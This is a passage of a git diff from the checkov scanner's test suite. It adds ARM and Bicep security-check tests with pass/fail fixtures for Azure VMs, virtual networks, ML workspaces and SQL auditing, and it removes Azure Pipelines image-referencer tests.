+        self.assertEqual(summary["resource_count"], 3)  # 3 unknown
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_VMCredsInCustomData.py b/tests/arm/checks/resource/test_VMCredsInCustomData.py
new file mode 100644
index 00000000000..345f12d22cc
--- /dev/null
+++ b/tests/arm/checks/resource/test_VMCredsInCustomData.py
@@ -0,0 +1,43 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.VMCredsInCustomData import check
+from checkov.arm.runner import Runner
+
+
+class TestVMCredsInCustomData(unittest.TestCase):
+    def test(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_VMCredsInCustomData"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Compute/virtualMachines.pass-no-secret",
+            "Microsoft.Compute/virtualMachines.pass-no-custom-date",
+            "Microsoft.Compute/virtualMachines.pass-empty-os-profile",
+            "Microsoft.Compute/virtualMachines.pass-no-os-profile",
+        }
+        failing_resources = {
+            "Microsoft.Compute/virtualMachines.fail-secret",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 4)
+        self.assertEqual(summary["failed"], 1)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_VMStorageOsDisk.py b/tests/arm/checks/resource/test_VMStorageOsDisk.py
new file mode 100644
index 00000000000..ed5a6736371
--- /dev/null
+++ b/tests/arm/checks/resource/test_VMStorageOsDisk.py
@@ -0,0 +1,44 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.VMStorageOsDisk import check
+from checkov.arm.runner import Runner
+
+
+class TestVMStorageOsDisk(unittest.TestCase):
+
+    def test(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_VMStorageOsDisk"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Compute/virtualMachines.pass-linux",
+            "Microsoft.Compute/virtualMachines.pass-windows",
+        }
+        failing_resources = {
+            "Microsoft.Compute/virtualMachines.fail-linux",
+            "Microsoft.Compute/virtualMachines.fail-windows",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], 2)
+        self.assertEqual(summary["failed"], 2)
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+        self.assertEqual(summary["resource_count"], 4)  # 3 unknown
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_VnetLocalDNS.py b/tests/arm/checks/resource/test_VnetLocalDNS.py
new file mode 100644
index 00000000000..37b341ffd66
--- /dev/null
+++ b/tests/arm/checks/resource/test_VnetLocalDNS.py
@@ -0,0 +1,39 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.VnetLocalDNS import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestVnetLocalDNS(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_VnetLocalDNS"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Network/virtualNetworks.pass",
+            "Microsoft.Network/virtualNetworks.pass2",
+        }
+        failing_resources = {
+            "Microsoft.Network/virtualNetworks.fail",
+            "Microsoft.Network/virtualNetworks.fail2",
+            "Microsoft.Network/virtualNetworks.fail3",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
diff --git a/tests/arm/checks/resource/test_VnetSingleDNSServer.py b/tests/arm/checks/resource/test_VnetSingleDNSServer.py
new file mode 100644
index 00000000000..fc4c8684ee9
--- /dev/null
+++ b/tests/arm/checks/resource/test_VnetSingleDNSServer.py
@@ -0,0 +1,45 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.VnetSingleDNSServer import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestVnetSingleDNSServer(unittest.TestCase):
+    def test(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_VnetSingleDNSServer"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Network/networkInterfaces.pass",
+            "Microsoft.Network/networkInterfaces.pass2",
+            "Microsoft.Network/networkInterfaces.pass3",
+            "Microsoft.Network/virtualNetworks.pass4"
+        }
+        failing_resources = {
+            "Microsoft.Network/networkInterfaces.fail",
+            "Microsoft.Network/networkInterfaces.fail2",
+            "Microsoft.Network/virtualNetworks.fail3"
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_WinVMAutomaticUpdates.py b/tests/arm/checks/resource/test_WinVMAutomaticUpdates.py
new file mode 100644
index 00000000000..7f6e3562fb1
--- /dev/null
+++ b/tests/arm/checks/resource/test_WinVMAutomaticUpdates.py
@@ -0,0 +1,44 @@
+import unittest
+from pathlib import Path
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.checks.resource.WinVMAutomaticUpdates import check
+from checkov.arm.runner import Runner
+
+
+class TestWinVMAutomaticUpdates(unittest.TestCase):
+    def test(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_WinVMAutomaticUpdates"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.Compute/virtualMachines.pass",
+            "Microsoft.Compute/virtualMachineScaleSets.pass",
+            "Microsoft.Compute/virtualMachines.missing",
+            "Microsoft.Compute/virtualMachineScaleSets.missing"
+        }
+        failing_resources = {
+            "Microsoft.Compute/virtualMachines.fail",
+            "Microsoft.Compute/virtualMachineScaleSets.fail",
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/expected.yaml b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/expected.yaml
new file mode 100644
index 00000000000..6cc0925b453
--- /dev/null
+++ b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/expected.yaml
@@ -0,0 +1,7 @@
+pass:
+  - "Microsoft.MachineLearningServices/workspaces.pass"
+  - "Microsoft.MachineLearningServices/workspaces.pass2"
+fail:
+  - "Microsoft.MachineLearningServices/workspaces.fail"
+evaluated_keys:
+  - 'properties/publicNetworkAccess'
diff --git a/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/fail.json b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/fail.json
new file mode 100644
index 00000000000..42f38467201
--- /dev/null
+++ b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/fail.json
@@ -0,0 +1,15 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.MachineLearningServices/workspaces",
+      "apiVersion": "2022-12-01",
+      "name": "fail",
+      "location": "West US",
+      "properties": {
+        "publicNetworkAccess": "Enabled"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass.json b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass.json
new file mode 100644
index 00000000000..1c959d41049
--- /dev/null
+++ b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass.json
@@ -0,0 +1,15 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.MachineLearningServices/workspaces",
+      "apiVersion": "2022-12-01",
+      "name": "pass",
+      "location": "West US",
+      "properties": {
+        "publicNetworkAccess": "Disabled"
+      }
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass2.json b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass2.json
new file mode 100644
index 00000000000..6161a6b423d
--- /dev/null
+++ b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass2.json
@@ -0,0 +1,13 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "resources": [
+    {
+      "type": "Microsoft.MachineLearningServices/workspaces",
+      "apiVersion": "2022-12-01",
+      "name": "pass2",
+      "location": "West US",
+      "properties": {}
+    }
+  ]
+}
\ No newline at end of file
diff --git a/tests/arm/graph_builder/checks/test_yaml_policies.py b/tests/arm/graph_builder/checks/test_yaml_policies.py
index 5aa84eaae5b..e7789d79b5e 100644
--- a/tests/arm/graph_builder/checks/test_yaml_policies.py
+++ b/tests/arm/graph_builder/checks/test_yaml_policies.py
@@ -40,6 +40,9 @@ def setUp(self) -> None:
     def test_AzureSpringCloudConfigWithVnet(self):
         self.go("AzureSpringCloudConfigWithVnet")
 
+    def test_AzureMLWorkspacePublicNetwork(self):
+        self.go("AzureMLWorkspacePublicNetwork")
+
     def test_registry_load(self):
         registry = self.get_checks_registry()
         self.assertGreater(len(registry.checks), 0)
diff --git a/tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml b/tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml
deleted file mode 100644
index 69138e5084c..00000000000
--- a/tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-trigger:
-- master
-
-resources:
-  repositories:
-  - repository: AzureDevOps
-    type: git
-    endpoint: AzureDevOps
-    name: AzureDevOps/AzureDevOps
-
-stages:
-- stage: Example
-  jobs:
-  - job: FailNoTag
-    displayName: FailNoTagDisplayName
-    pool:
-      vmImage: 'ubuntu-18.04'
-    steps:
-      - task: Docker@2
-        inputs:
-          container: postgres:14.2
-
-  - job: PassDigest
-    pool:
-      vmImage: 'ubuntu-18.04'
-
-    container: nginx:1.17
-
-    steps:
-      - script: printenv
-
-jobs:
-- job: MyJob
-  container: ruby:2.6
-  pool:
-    vmImage: windows-latest
-  steps:
-  - script: echo "Running in a container based on myorg/mycontainer:1.0"
-- job: MyJob2
-  container:
-    image: ruby:2.6
-  pool:
-    vmImage: ubuntu-latest
-  steps:
-  - script: echo "Running in a container based on ruby:2.6"
\ No newline at end of file
diff --git a/tests/azure_pipelines/image_referencer/resources/single_image/azure-pipelines.yaml b/tests/azure_pipelines/image_referencer/resources/single_image/azure-pipelines.yaml
deleted file mode 100644
index 7f54262b530..00000000000
--- a/tests/azure_pipelines/image_referencer/resources/single_image/azure-pipelines.yaml
+++ /dev/null
@@ -1,15 +0,0 @@
-trigger:
-- master
-
-resources:
-  repositories:
-  - repository: AzureDevOps
-    type: git
-    endpoint: AzureDevOps
-    name: AzureDevOps/AzureDevOps
-
-jobs:
-- job: PassTag
-  pool:
-    vmImage: 'ubuntu-18.04'
-  container: redis:latest
\ No newline at end of file
diff --git a/tests/azure_pipelines/image_referencer/test_azure_pipelines_provider_and_manager.py b/tests/azure_pipelines/image_referencer/test_azure_pipelines_provider_and_manager.py
deleted file mode 100644
index 15d932d1474..00000000000
--- a/tests/azure_pipelines/image_referencer/test_azure_pipelines_provider_and_manager.py
+++ /dev/null
@@ -1,528 +0,0 @@
-from checkov.common.images.image_referencer import Image
-from checkov.azure_pipelines.image_referencer.provider import AzurePipelinesProvider
-from checkov.azure_pipelines.image_referencer.manager import AzurePipelinesImageReferencerManager
-
-
-def test_provider_extract_images_from_workflow():
-    file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml'
-    workflow_config = {
-    "trigger":
-    [
-        "master"
-    ],
-    "resources":
-    {
-        "repositories":
-        [
-            {
-                "repository": "AzureDevOps",
-                "type": "git",
-                "endpoint": "AzureDevOps",
-                "name": "AzureDevOps/AzureDevOps",
-                "__startline__": 6,
-                "__endline__": 11
-            }
-        ],
-        "__startline__": 5,
-        "__endline__": 11
-    },
-    "stages":
-    [
-        {
-            "stage": "Example",
-            "jobs":
-            [
-                {
-                    "job": "FailNoTag",
-                    "displayName": "FailNoTagDisplayName",
-                    "pool":
-                    {
-                        "vmImage": "ubuntu-18.04",
-                        "__startline__": 17,
-                        "__endline__": 18
-                    },
-                    "steps":
-                    [
-                        {
-                            "task": "Docker@2",
-                            "inputs":
-                            {
-                                "container": "postgres:14.2",
-                                "__startline__": 21,
-                                "__endline__": 23
-                            },
-                            "__startline__": 19,
-                            "__endline__": 23
-                        }
-                    ],
-                    "__startline__": 14,
-                    "__endline__": 23
-                },
-                {
-                    "job": "PassDigest",
-                    "pool":
-                    {
-                        "vmImage": "ubuntu-18.04",
-                        "__startline__": 25,
-                        "__endline__": 27
-                    },
-                    "container": "nginx:1.17",
-                    "steps":
-                    [
-                        {
-                            "script": "printenv",
-                            "__startline__": 30,
-                            "__endline__": 32
-                        }
-                    ],
-                    "__startline__": 23,
-                    "__endline__": 32
-                }
-            ],
-            "__startline__": 12,
-            "__endline__": 32
-        }
-    ],
-    "jobs":
-    [
-        {
-            "job": "MyJob",
-            "container": "ruby:2.6",
-            "pool":
-            {
-                "vmImage": "windows-latest",
-                "__startline__": 36,
-                "__endline__": 37
-            },
-            "steps":
-            [
-                {
-                    "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"",
-                    "__startline__": 38,
-                    "__endline__": 39
-                }
-            ],
-            "__startline__": 33,
-            "__endline__": 39
-        },
-        {
-            "job": "MyJob2",
-            "container":
-            {
-                "image": "ruby:2.6",
-                "__startline__": 41,
-                "__endline__": 42
-            },
-            "pool":
-            {
-                "vmImage": "ubuntu-latest",
-                "__startline__": 43,
-                "__endline__": 44
-            },
-            "steps":
-            [
-                {
-                    "script": "echo \"Running in a container based on ruby:2.6\"",
-                    "__startline__": 45,
-                    "__endline__": 45
-                }
-            ],
-            "__startline__": 39,
-            "__endline__": 45
-        }
-    ],
-    "__startline__": 1,
-    "__endline__": 45
-}
-
-    azure_pipelines_provider = AzurePipelinesProvider(workflow_config=workflow_config, file_path=file_path)
-    images = azure_pipelines_provider.extract_images_from_workflow()
-
-    assert set(images) == {
-        Image(
-            end_line=23,
-            start_line=21,
-            file_path=file_path,
-            name='postgres:14.2',
-            related_resource_id='stages[0](Example).jobs[0](FailNoTagDisplayName).steps[0].inputs'
-        ),
-        Image(
-            end_line=32,
-            start_line=23,
-            file_path=file_path,
-            name='nginx:1.17',
-            related_resource_id='stages[0](Example).jobs[1](PassDigest)'
-        ),
-        Image(
-            end_line=39,
-            start_line=33,
-            file_path=file_path,
-            name='ruby:2.6',
-            related_resource_id='jobs[0](MyJob)'
-        ),
-        Image(
-            end_line=45,
-            start_line=39,
-            file_path=file_path,
-            name='ruby:2.6',
-            related_resource_id='jobs[1](MyJob2)'
-        )
-    }
-
-def test_provider_extract_images_from_workflow_no_images():
-    file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml'
-    workflow_config = {
-    "trigger":
-    [
-        "master"
-    ],
-    "resources":
-    {
-        "repositories":
-        [
-            {
-                "repository": "AzureDevOps",
-                "type": "git",
-                "endpoint": "AzureDevOps",
-                "name": "AzureDevOps/AzureDevOps",
-                "__startline__": 6,
-                "__endline__": 11
-            }
-        ],
-        "__startline__": 5,
-        "__endline__": 11
-    },
-    "stages":
-    [
-        {
-            "stage": "Example",
-            "jobs":
-            [
-                {
-                    "job": "FailNoTag",
-                    "displayName": "FailNoTagDisplayName",
-                    "pool":
-                    {
-                        "vmImage": "ubuntu-18.04",
-                        "__startline__": 17,
-                        "__endline__": 19
-                    },
-                    "__startline__": 14,
-                    "__endline__": 19
-                },
-                {
-                    "job": "PassDigest",
-                    "pool":
-                    {
-                        "vmImage": "ubuntu-18.04",
-                        "__startline__": 21,
-                        "__endline__": 23
-                    },
-                    "steps":
-                    [
-                        {
-                            "script": "printenv",
-                            "__startline__": 24,
-                            "__endline__": 26
-                        }
-                    ],
-                    "__startline__": 19,
-                    "__endline__": 26
-                }
-            ],
-            "__startline__": 12,
-            "__endline__": 26
-        }
-    ],
-    "jobs":
-    [
-        {
-            "job": "MyJob",
-            "pool":
-            {
-                "vmImage": "windows-latest",
-                "__startline__": 29,
-                "__endline__": 30
-            },
-            "steps":
-            [
-                {
-                    "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"",
-                    "__startline__": 31,
-                    "__endline__": 31
-                }
-            ],
-            "__startline__": 27,
-            "__endline__": 31
-        }
-    ],
-    "__startline__": 1,
-    "__endline__": 31
-}
-
-    azure_pipelines_provider = AzurePipelinesProvider(workflow_config=workflow_config, file_path=file_path)
-    images = azure_pipelines_provider.extract_images_from_workflow()
-
-    assert not images
-
-def test_manager_extract_images_from_workflow():
-    file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml'
-    workflow_config = {
-    "trigger":
-    [
-        "master"
-    ],
-    "resources":
-    {
-        "repositories":
-        [
-            {
-                "repository": "AzureDevOps",
-                "type": "git",
-                "endpoint": "AzureDevOps",
-                "name": "AzureDevOps/AzureDevOps",
-                "__startline__": 6,
-                "__endline__": 11
-            }
-        ],
-        "__startline__": 5,
-        "__endline__": 11
-    },
-    "stages":
-    [
-        {
-            "stage": "Example",
-            "jobs":
-            [
-                {
-                    "job": "FailNoTag",
-                    "displayName": "FailNoTagDisplayName",
-                    "pool":
-                    {
-                        "vmImage": "ubuntu-18.04",
-                        "__startline__": 17,
-                        "__endline__": 18
-                    },
-                    "steps":
-                    [
-                        {
-                            "task": "Docker@2",
-                            "inputs":
-                            {
-                                "container": "postgres:14.2",
-                                "__startline__": 21,
-                                "__endline__": 23
-                            },
-                            "__startline__": 19,
-                            "__endline__": 23
-                        }
-                    ],
-                    "__startline__": 14,
-                    "__endline__": 23
-                },
-                {
-                    "job": "PassDigest",
-                    "pool":
-                    {
-                        "vmImage": "ubuntu-18.04",
-                        "__startline__": 25,
-                        "__endline__": 27
-                    },
-                    "container": "nginx:1.17",
-                    "steps":
-                    [
-                        {
-                            "script": "printenv",
-                            "__startline__": 30,
-                            "__endline__": 32
-                        }
-                    ],
-                    "__startline__": 23,
-                    "__endline__": 32
-                }
-            ],
-            "__startline__": 12,
-            "__endline__": 32
-        }
-    ],
-    "jobs":
-    [
-        {
-            "job": "MyJob",
-            "container": "ruby:2.6",
-            "pool":
-            {
-                "vmImage": "windows-latest",
-                "__startline__": 36,
-                "__endline__": 37
-            },
-            "steps":
-            [
-                {
-                    "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"",
-                    "__startline__": 38,
-                    "__endline__": 39
-                }
-            ],
-            "__startline__": 33,
-            "__endline__": 39
-        },
-        {
-            "job": "MyJob2",
-            "container":
-            {
-                "image": "ruby:2.6",
-                "__startline__": 41,
-                "__endline__": 42
-            },
-            "pool":
-            {
-                "vmImage": "ubuntu-latest",
-                "__startline__": 43,
-                "__endline__": 44
-            },
-            "steps":
-            [
-                {
-                    "script": "echo \"Running in a container based on ruby:2.6\"",
-                    "__startline__": 45,
-                    "__endline__": 45
-                }
-            ],
-            "__startline__": 39,
-            "__endline__": 45
-        }
-    ],
-    "__startline__": 1,
-    "__endline__": 45
-}
-
-    manager = AzurePipelinesImageReferencerManager(workflow_config=workflow_config, file_path=file_path)
-    images = manager.extract_images_from_workflow()
-
-    assert set(images) == {
-        Image(
-            end_line=23,
-            start_line=21,
-            file_path=file_path,
-            name='postgres:14.2',
-            related_resource_id='stages[0](Example).jobs[0](FailNoTagDisplayName).steps[0].inputs'
-        ),
-        Image(
-            end_line=32,
-            start_line=23,
-            file_path=file_path,
-            name='nginx:1.17',
-            related_resource_id='stages[0](Example).jobs[1](PassDigest)'
-        ),
-        Image(
-            end_line=39,
-            start_line=33,
-            file_path=file_path,
-            name='ruby:2.6',
-            related_resource_id='jobs[0](MyJob)'
-        ),
-        Image(
-            end_line=45,
-            start_line=39,
-            file_path=file_path,
-            name='ruby:2.6',
-            related_resource_id='jobs[1](MyJob2)'
-        )
-    }
-
-def test_manager_extract_images_from_workflow_no_images():
-    file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml'
-    workflow_config = {
-    "trigger":
-    [
-        "master"
-    ],
-    "resources":
-    {
-        "repositories":
-        [
-            {
-                "repository": "AzureDevOps",
-                "type": "git",
-                "endpoint": "AzureDevOps",
-                "name": "AzureDevOps/AzureDevOps",
-                "__startline__": 6,
-                "__endline__": 11
-            }
-        ],
-        "__startline__": 5,
-        "__endline__": 11
-    },
-    "stages":
-    [
-        {
-            "stage": "Example",
-            "jobs":
-            [
-                {
-                    "job": "FailNoTag",
-                    "displayName": "FailNoTagDisplayName",
-                    "pool":
-                    {
-                        "vmImage": "ubuntu-18.04",
-                        "__startline__": 17,
-                        "__endline__": 19
-                    },
-                    "__startline__": 14,
-                    "__endline__": 19
-                },
-                {
-                    "job": "PassDigest",
-                    "pool":
-                    {
-                        "vmImage": "ubuntu-18.04",
-                        "__startline__": 21,
-                        "__endline__": 23
-                    },
-                    "steps":
-                    [
-                        {
-                            "script": "printenv",
-                            "__startline__": 24,
-                            "__endline__": 26
-                        }
-                    ],
-                    "__startline__": 19,
-                    "__endline__": 26
-                }
-            ],
-            "__startline__": 12,
-            "__endline__": 26
-        }
-    ],
-    "jobs":
-    [
-        {
-            "job": "MyJob",
-            "pool":
-            {
-                "vmImage": "windows-latest",
-                "__startline__": 29,
-                "__endline__": 30
-            },
-            "steps":
-            [
-                {
-                    "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"",
-                    "__startline__": 31,
-                    "__endline__": 31
-                }
-            ],
-            "__startline__": 27,
-            "__endline__": 31
-        }
-    ],
-    "__startline__": 1,
-    "__endline__": 31
-}
-
-    manager = AzurePipelinesImageReferencerManager(workflow_config=workflow_config, file_path=file_path)
-    images = manager.extract_images_from_workflow()
-
-    assert not images
diff --git a/tests/azure_pipelines/image_referencer/test_runner.py b/tests/azure_pipelines/image_referencer/test_runner.py
deleted file mode 100644
index 57bd9faa3e6..00000000000
--- a/tests/azure_pipelines/image_referencer/test_runner.py
+++ /dev/null
@@ -1,57 +0,0 @@
-from pathlib import Path
-
-from checkov.common.output.report import CheckType
-
-from checkov.common.bridgecrew.bc_source import get_source_type
-from checkov.azure_pipelines.runner import Runner
-
-from checkov.runner_filter import RunnerFilter
-from pytest_mock import MockerFixture
-
-from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async
-
-RESOURCES_PATH = Path(__file__).parent / "resources/single_image"
-
-
-def test_azure_pipelines_workflow(mocker: MockerFixture):
-    from checkov.common.bridgecrew.platform_integration import bc_integration
-    file_name = "azure-pipelines.yaml"
-    image_name = "redis:latest"
-    test_file = RESOURCES_PATH / file_name
-
-    runner_filter = RunnerFilter(run_image_referencer=True)
-    bc_integration.bc_source = get_source_type("disabled")
-
-    mocker.patch(
-        "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
-        side_effect=mock_get_image_cached_result_async,
-    )
-    mocker.patch(
-        "checkov.common.images.image_referencer.get_license_statuses_async",
-        side_effect=mock_get_license_statuses_async,
-    )
-
-    reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)
-
-    assert len(reports) == 2
-
-    azure_pipelines_report = next(report for report in reports if report.check_type == CheckType.AZURE_PIPELINES)
-    sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)
-
-    assert len(azure_pipelines_report.resources) == 0
-    assert len(azure_pipelines_report.passed_checks) == 1
-    assert len(azure_pipelines_report.failed_checks) == 2
-    assert len(azure_pipelines_report.skipped_checks) == 0
-    assert len(azure_pipelines_report.parsing_errors) == 0
-
-
-    assert sca_image_report.image_cached_results[0]["dockerImageName"] == image_name
-    assert sca_image_report.image_cached_results[0]["packages"] == [
-        {"type": "os", "name": "tzdata", "version": "2021a-1+deb11u5", "licenses": []}
-    ]
-
-    assert len(sca_image_report.passed_checks) == 1
-    assert len(sca_image_report.failed_checks) == 4
-    assert len(sca_image_report.image_cached_results) == 1
-    assert len(sca_image_report.skipped_checks) == 0
-    assert len(sca_image_report.parsing_errors) == 0
diff --git a/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/expected.yaml b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/expected.yaml
new file mode 100644
index 00000000000..a4761b59575
--- /dev/null
+++ b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/expected.yaml
@@ -0,0 +1,10 @@
+pass:
+  - 'Microsoft.Sql/servers.sqlServer_pass'
+fail:
+  - 'Microsoft.Sql/servers.sqlServer_fail1'
+  - 'Microsoft.Sql/servers.sqlServer_fail2'
+  - 'Microsoft.Sql/servers.sqlServer_fail3'
+evaluated_keys:
+  - 'properties/retentionDays'
+  - 'properties/state'
+  - 'resource_type'
\ No newline at end of file
diff --git a/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail1_less_90.bicep b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail1_less_90.bicep
new file mode 100644
index 00000000000..cde4d44edb9
--- /dev/null
+++ b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail1_less_90.bicep
@@ -0,0 +1,15 @@
+resource sqlServer_fail1 'Microsoft.Sql/servers@2023-05-01-preview' = {  
+  name: sqlServerName
+}
+
+/// SQL Auditing
+
+resource sql_auditing_fail1 'Microsoft.Sql/servers/auditingSettings@2023-05-01-preview' = {
+  name: 'default'
+  parent: sqlServer_fail1
+  properties: {
+    isAzureMonitorTargetEnabled: true
+    retentionDays: 67
+    state: 'Enabled'
+  }
+}
diff --git a/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail2_no_auditsettings.bicep b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail2_no_auditsettings.bicep
new file mode 100644
index 00000000000..2e0aad4327f
--- /dev/null
+++ b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail2_no_auditsettings.bicep
@@ -0,0 +1,5 @@
+resource sqlServer_fail2 'Microsoft.Sql/servers@2023-05-01-preview' = {  
+  name: sqlServerName
+}
+
+/// No SQL Audit Settings
diff --git a/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail3_not_enabled.bicep b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail3_not_enabled.bicep
new file mode 100644
index 00000000000..9aa87f5660f
--- /dev/null
+++ b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/fail3_not_enabled.bicep
@@ -0,0 +1,15 @@
+resource sqlServer_fail3 'Microsoft.Sql/servers@2023-05-01-preview' = {  
+  name: sqlServerName
+}
+
+/// SQL Auditing
+
+resource sql_auditing_fail3 'Microsoft.Sql/servers/auditingSettings@2023-05-01-preview' = {
+  name: 'default'
+  parent: sqlServer_fail3
+  properties: {
+    isAzureMonitorTargetEnabled: true
+    retentionDays: 92
+    state: 'Disabled'
+  }
+}
diff --git a/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/pass1.bicep b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/pass1.bicep
new file mode 100644
index 00000000000..43609aa52e5
--- /dev/null
+++ b/tests/bicep/graph/checks/resources/SQLServerAuditingRetention90Days/pass1.bicep
@@ -0,0 +1,15 @@
+resource sqlServer_pass 'Microsoft.Sql/servers@2023-05-01-preview' = {  
+  name: sqlServerName
+}
+
+/// SQL Auditing
+
